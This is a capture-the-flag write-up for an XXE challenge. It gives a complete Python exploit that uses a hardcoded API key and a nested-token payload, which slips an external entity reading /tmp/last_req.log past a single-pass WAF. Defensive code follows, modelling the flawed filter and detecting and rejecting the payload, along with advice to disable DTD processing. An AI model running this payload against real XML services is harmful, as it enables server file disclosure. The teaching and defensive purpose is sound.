Wizer - Challenge 65 - XXE WAF bypass

I got the first blood on this challenge!

Exploit

import requests

url = "https://chal65-youb333.vercel.app"

# Step 1: call the CRM endpoint with the API key; the response is the data the
# XXE later reads back from the server-side request log.
r = requests.post(url + "/getCRMUsers", json={
    "apiKey": "89DHJN3UYFL49FK09KGGGGSS90KFK2390KCFVC12"
})

print(r.text)

# WAF removing recursively by order!!
# Not going to check again: the WAF strips its blocked tokens in one ordered
# pass and never re-scans the result, so nesting one blocked token inside
# another ("<<!DOCTYPE!ENTITY", "SYSTEPUBLICM", "fiphp://le://") reassembles
# the real DTD markup ("<!ENTITY", "SYSTEM", "file://") after filtering.
r = requests.post(url + "/createCard", json={
    "firstName": '"><<!DOCTYPE!ENTITY xxe SYSTEPUBLICM "fiphp://le:///tmp/last_req.log',
    "role": '&xxe;'
})

print(r.text)
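To make the filter weakness concrete from the defender's side, here is an added example that is not part of the writeup and not the challenge's actual WAF code. The blocklist and its order are assumptions reconstructed from the payload above (the real list is not published); the functions model a single-pass strip filter, show that its output is order-dependent and can contain tokens the input never had, and contrast it with a reject-on-match policy that cannot be reassembled around.

```python
import json

# Assumed blocklist, ordered so that a single pass reproduces the behaviour
# the writeup observed: the later deletions recreate the earlier tokens.
BLOCKLIST = ["<!ENTITY", "SYSTEM", "file://", "<!DOCTYPE", "PUBLIC", "php://"]

# The payload field from the writeup, used here as a constructed test input.
PAYLOAD = '"><<!DOCTYPE!ENTITY xxe SYSTEPUBLICM "fiphp://le:///tmp/last_req.log'


def strip_once(value, blocklist=BLOCKLIST):
    """The weak filter: delete each blocked token once, in list order,
    without re-scanning what the deletions leave behind."""
    for token in blocklist:
        value = value.replace(token, "")
    return value


def find_blocked_tokens(value, blocklist=BLOCKLIST):
    """Detection helper: which blocked tokens occur in a field as submitted."""
    return [token for token in blocklist if token in value]


def reassembled_tokens(value, blocklist=BLOCKLIST):
    """Tokens that are absent before filtering but present after it.
    A non-empty result proves the strip filter manufactured forbidden markup."""
    before = set(find_blocked_tokens(value, blocklist))
    after = find_blocked_tokens(strip_once(value, blocklist), blocklist)
    return [token for token in after if token not in before]


def reject_field(value, blocklist=BLOCKLIST):
    """The hardened policy: never rewrite input, only accept or reject it.
    Because nothing is deleted, there is no residue to recombine."""
    return bool(find_blocked_tokens(value, blocklist))


def check_request(body, blocklist=BLOCKLIST):
    """Scan every string field of a JSON request body and return
    (field, token) pairs that should cause the request to be rejected."""
    findings = []
    for field, value in body.items():
        if isinstance(value, str):
            for token in find_blocked_tokens(value, blocklist):
                findings.append((field, token))
    return findings


if __name__ == "__main__":
    print("single pass  :", strip_once(PAYLOAD))
    print("reverse order:", strip_once(PAYLOAD, list(reversed(BLOCKLIST))))
    print("manufactured :", reassembled_tokens(PAYLOAD))
    body = json.loads(json.dumps({"firstName": PAYLOAD, "role": "&xxe;"}))
    print("reject?      :", check_request(body))
```

Running it shows that the same blocklist in reverse order neutralises this particular input while the forward order emits a complete `<!ENTITY ... SYSTEM "file://...">` declaration, which is why a stripping filter is not a sanitiser. The durable fix is not a better blocklist but a parser with DTD processing and external entity resolution disabled, with the WAF used only to reject and log requests that carry DTD markup.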